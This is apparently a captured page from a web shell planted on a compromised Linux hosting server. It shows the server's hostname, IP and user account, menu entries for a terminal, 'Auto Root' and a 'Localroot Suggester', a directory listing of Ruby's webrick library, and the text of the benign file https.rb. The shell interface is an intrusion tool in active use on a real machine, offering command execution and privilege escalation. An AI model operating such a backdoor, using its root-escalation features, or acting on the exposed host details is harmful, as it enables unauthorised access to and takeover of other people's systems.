Linux velvet.gennetworks.in 4.18.0-553.83.1.lve.el8.x86_64 #1 SMP Wed Nov 12 10:04:12 UTC 2025 x86_64
LiteSpeed
Server IP : 161.129.70.235 & Your IP : 216.73.216.5
Domains :
Cant Read [ /etc/named.conf ]
User : virtueex
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby23 /
lib64 /
ruby /
2.3.0 /
webrick /
Delete
Unzip
Name
Size
Permission
Date
Action
httpauth
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
httpservlet
[ DIR ]
drwxr-xr-x
2026-02-18 15:11
accesslog.rb
4.34
KB
-rw-r--r--
2015-12-16 10:37
cgi.rb
8
KB
-rw-r--r--
2015-12-16 10:37
compat.rb
943
B
-rw-r--r--
2015-12-16 10:37
config.rb
5.59
KB
-rw-r--r--
2015-12-16 10:37
cookie.rb
3.91
KB
-rw-r--r--
2015-12-16 10:37
htmlutils.rb
711
B
-rw-r--r--
2015-12-16 10:37
httpauth.rb
3.36
KB
-rw-r--r--
2015-12-16 10:37
httpproxy.rb
9.62
KB
-rw-r--r--
2015-12-16 10:37
httprequest.rb
14.81
KB
-rw-r--r--
2018-03-28 14:43
httpresponse.rb
11.86
KB
-rw-r--r--
2018-03-28 19:43
https.rb
1.9
KB
-rw-r--r--
2015-12-16 10:37
httpserver.rb
7.75
KB
-rw-r--r--
2017-12-14 19:06
httpservlet.rb
700
B
-rw-r--r--
2015-12-16 10:37
httpstatus.rb
5.19
KB
-rw-r--r--
2017-09-14 16:56
httputils.rb
12.74
KB
-rw-r--r--
2015-12-16 10:37
httpversion.rb
1.6
KB
-rw-r--r--
2015-12-16 10:37
log.rb
3.99
KB
-rw-r--r--
2017-09-14 16:56
server.rb
10.49
KB
-rw-r--r--
2017-12-14 19:03
ssl.rb
6.71
KB
-rw-r--r--
2015-12-16 10:37
utils.rb
6.37
KB
-rw-r--r--
2015-12-19 13:46
version.rb
415
B
-rw-r--r--
2015-12-16 10:37
Save
Rename
# frozen_string_literal: false # # https.rb -- SSL/TLS enhancement for HTTPServer # # Author: IPR -- Internet Programming with Ruby -- writers # Copyright (c) 2001 GOTOU Yuuzou # Copyright (c) 2002 Internet Programming with Ruby writers. All rights # reserved. # # $IPR: https.rb,v 1.15 2003/07/22 19:20:42 gotoyuzo Exp $ require 'webrick/ssl' module WEBrick module Config HTTP.update(SSL) end ## #-- # Adds SSL functionality to WEBrick::HTTPRequest class HTTPRequest ## # HTTP request SSL cipher attr_reader :cipher ## # HTTP request server certificate attr_reader :server_cert ## # HTTP request client certificate attr_reader :client_cert # :stopdoc: alias orig_parse parse def parse(socket=nil) if socket.respond_to?(:cert) @server_cert = socket.cert || @config[:SSLCertificate] @client_cert = socket.peer_cert @client_cert_chain = socket.peer_cert_chain @cipher = socket.cipher end orig_parse(socket) end alias orig_parse_uri parse_uri def parse_uri(str, scheme="https") if server_cert return orig_parse_uri(str, scheme) end return orig_parse_uri(str) end private :parse_uri alias orig_meta_vars meta_vars def meta_vars meta = orig_meta_vars if server_cert meta["HTTPS"] = "on" meta["SSL_SERVER_CERT"] = @server_cert.to_pem meta["SSL_CLIENT_CERT"] = @client_cert ? @client_cert.to_pem : "" if @client_cert_chain @client_cert_chain.each_with_index{|cert, i| meta["SSL_CLIENT_CERT_CHAIN_#{i}"] = cert.to_pem } end meta["SSL_CIPHER"] = @cipher[0] meta["SSL_PROTOCOL"] = @cipher[1] meta["SSL_CIPHER_USEKEYSIZE"] = @cipher[2].to_s meta["SSL_CIPHER_ALGKEYSIZE"] = @cipher[3].to_s end meta end # :startdoc: end end